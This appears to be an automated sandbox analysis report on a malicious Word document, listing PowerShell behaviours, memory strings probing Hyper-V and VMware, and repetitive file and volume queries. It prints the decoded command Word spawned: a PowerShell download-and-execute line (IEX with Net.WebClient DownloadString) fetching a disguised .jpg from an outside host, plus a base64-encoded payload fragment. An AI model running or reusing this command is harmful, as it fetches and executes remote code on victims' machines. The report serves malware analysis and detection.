      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4456Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5170Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176Thread sleep time: -12912720851596678s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC9D7C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter(WZ%
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC9D7C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-VMScsiControllerxBX%
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $controllers = Get-VMScsiController -VM $currentVm `
      Source: powershell.exe, 00000004.00000002.12721820498.000002ADE08BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWgA%SystemRoot%\system32\mswsock.dllgBiADcANwA4ADYANAA1ADUAOABkAC8AOABlAGUAZgA0AGQAZgAzADgAOABmADIAMgAxADcAYwBhAGUAYwAzAGQAYwAyADYALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQB
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC903F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-VMScsiControllerP
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC903F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $_.VirtualSystemType -eq 'Microsoft:Hyper-V:System:Realized'
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC903F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-VMScsiController(WZ%
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC903F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: !Microsoft:Hyper-V:System:Realized(WZ%
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC903F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Import-Module Hyper-V
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC936B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMwareESXi
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC98A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMwareESXiH^
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OResourceType=32768 and ResourceSubType='Microsoft:Hyper-V:Storage Logical Unit'xBX%
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC903F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -Filter "ResourceType=32768 and ResourceSubType='Microsoft:Hyper-V:Storage Logical Unit'" `
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC9D7C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC903F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V(WZ%
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC9D7C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xml(WZ%
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC903F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *Microsoft.HyperV.PowerShell.VirtualMachineGX%
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC9D7C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC9D7C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxml(WZ%
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC9D7C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter(WZ%
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC903F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [Microsoft.HyperV.PowerShell.VirtualMachine[]]
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC903F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OResourceType=32768 and ResourceSubType='Microsoft:Hyper-V:Storage Logical Unit'
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC98A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <Value Name="VMwareESXi" Value="19" />
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: !Microsoft:Hyper-V:System:RealizedxBX%
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC903F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: # Hyper-V enforces a max of 64 locations per controller
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC9D7C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC9D7C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter(WZ%
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $controllers = Get-VMScsiController -VM $vms `
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC9D7C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $controller = Get-VMScsiController -VM $currentVm `
      Source: powershell.exe, 00000004.00000002.12696586915.000002ADC88EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-VxBX%
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Yara detected Powershell download and execute
      Source: Yara matchFile source: amsi64_7996.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7996, type: MEMORYSTR
      Encrypted powershell cmdline option found
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess created: Base64 decoded IEX (New-Object Net.WebClient).DownloadString('https://eternal.lol/file/8e53a3e023218a9b1ef9ba1ef3b5afd191a99156b77864558d/8eef4df388f2217caec3dc26.jpg');oawnduawdnnhn9283h1921nawodanfiawbdniufbnaidwuaifuabiufbaiudbhjawdbafhj
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess created: Base64 decoded IEX (New-Object Net.WebClient).DownloadString('https://eternal.lol/file/8e53a3e023218a9b1ef9ba1ef3b5afd191a99156b77864558d/8eef4df388f2217caec3dc26.jpg');oawnduawdnnhn9283h1921nawodanfiawbdniufbnaidwuaifuabiufbaiudbhjawdbafhjJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0011~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0011~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0011~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0011~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0011~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0011~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.22621.4111.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.22621.4036.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-US~10.0.22621.3958.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package03~31bf3856ad364e35~amd64~~10.0.22621.4391.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0519~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0011~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0011~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.22621.4460.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.22621.4460.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.22621.4460.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.22621.4460.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.22621.4460.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.22621.4460.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.22621.4460.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.22621.4460.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.22621.4460.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.22621.4460.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.22621.4460.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.22621.4460.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0015~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0015~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0015~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0015~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0015~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0015~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0015~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0015~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0015~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0015~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.22621.4169.cat VolumeInformationJump to behavior
